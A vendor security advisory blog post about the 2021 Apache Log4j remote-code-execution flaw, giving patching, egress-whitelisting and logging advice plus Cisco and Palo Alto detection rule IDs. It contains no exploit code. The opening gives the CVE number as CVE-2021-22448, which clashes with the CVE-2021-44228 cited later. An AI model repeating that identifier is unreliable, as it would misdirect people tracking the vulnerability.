Critical Vulnerability in Apache Log4j

A critical vulnerability has been discovered in Apache Log4j (CVE-2021-22448), which has a maximum CVSS score of 10. The vulnerability is considered easy to exploit, and unfortunately, Apache Log4j is widespread.

Apache Log4j is an open-source Java-based logging framework used in many Java applications, affecting products and systems in the cloud and on-prem.

The vulnerability is exploited by sending a specially configured package to a system using Apache Log4j. The package instructs the system to download and subsequently execute malicious software.

The vulnerability was identified on December 9, 2021, so it is very new, which means that many systems are still not patched or have an available patch. Many manufacturers continue to examine their products for whether they are vulnerable or not.

Conscia will update our customers through CNS and on social media as soon as we have new information.

What do I do now?

Keep an eye out for advisories from the manufacturers and Conscia.

Manufacturers are working hard to get their products tested and (if they prove to be vulnerable) create and distribute a patch against Log4j. Conscia follows and updates you through the CNS and social media.

Update your Apache Log4j

If you maintain a system that uses Apache Log4j, you should update to the latest version of Log4j.

Create a white-list of Internet traffic from your servers.

If your servers cannot download the malicious software from the Internet, your servers will not be affected by this vulnerability. Therefore, one should create rules in NGFW, Proxy or Umbrella with a white-list of traffic towards legitimate update servers (Windows update etc.) and possibly DNS, NTP etc., if this is not hosted locally. All other traffic should be blocked.

Logging

Keep an eye on the log in your firewall, your network, and your servers in the near future. The vulnerability is being exploited, and all attack surfaces are not necessarily illuminated yet. Conscia can also help keep an eye on your log. Contact your account manager for more information.

For Cisco customers:

For customers with Cisco Firepower NGFW, Cisco has released Snort 2 and Snort 3 rules to detect and block the attack. You should verify that the rules are downloaded and deployed on your Firepower device.

‘Talos is releasing Snort 2 SIDs 58722-58733 and Snort 3 SIDs: 300055-300057 to address CVE-2021-44228, an RCE vulnerability in the Apache Log4j API.

Source: https://www.snort.org/advisories/talos-rules-2021-12-10
SSL decryption is required to detect all attempts to exploit this attack. If SSL decryption is impossible, you should create a white-list of FQDNs / URLs from your servers towards the Internet so that your systems can not download the malicious software or you should implement Secure Endpoint / Umbrella.
Cisco Secure Endpoint (AMP for Endpoint) can block attempts to exploit this vulnerability.
Cisco Umbrella can block access to malicious domains, IPs, and URLs.

Cisco has many products, so they are still investigating which products are potentially vulnerable. Cisco is updating the following advisory about your products.

Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd#vp

For Palo Alto customers:

Customers with Next-Generation Firewalls with an active Threat Prevention security subscription can detect and block sessions with the following Threat Ids:

91991 (initially released using Applications and Threat content update version 8498 and further enhanced with version 8499). Additionally, attacker infrastructure is continuously being monitored and blocked.

91994 and 91995 (released using Applications Threat content version 8500).
SSL decryption is required to detect all attempts to exploit this attack. If this is not possible, you should create a white-list of FQDNs / URLs from your Internet servers so that your systems can not download the malicious software or you should implement Cortex XDR.
Cortex XDR is protected through Behavioral Threat Protection (BTP) except Cortex on Linux, which is protected by the content package 290-78377.
Cortex XSOAR customers can use the “CVE-2021-44228 – Log4j RCE” package to detect and mitigate the vulnerability automatically.
Prisma Cloud Compute Defender agents can detect continuous integration (CI) project, container image, or host system that maintains a vulnerable Log4j package.

Source: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

Critical Vulnerability in Apache Log4j

More blog posts

Critical vulnerability in Palo Alto Gateway

4 Network Challenges and the Path to a Simple, Secure Network Solution

Unleashing Business Potential with Wi-Fi Tracking

7 IT Superpowers Using Observability

Exploring the Dark Side of Generative AI: The Rise of Cyber Threats in the Digital Age

What do I do now?

Update your Apache Log4j

Create a white-list of Internet traffic from your servers.

Logging

For Cisco customers:

NIS2: Vision, key objectives, and tactical strategies for your organization

Do you have any questions?

Related content

AI’s Role in Advancing and Combating Cyber Threats

Unlocking Security: Cisco and Conscia present the future of SSE and SASE

Critical vulnerability in Palo Alto Gateway

Exploring the Dark Side of Generative AI: The Rise of Cyber Threats in the Digital Age

OpenAI Sora – Threat or Opportunity?

Recorded Webinar: How to secure your email in 2024

A Structured Approach to Cybersecurity Governance, utilizing Maturity Assessment

Cisco Security 2023 – The Year in Review

Contact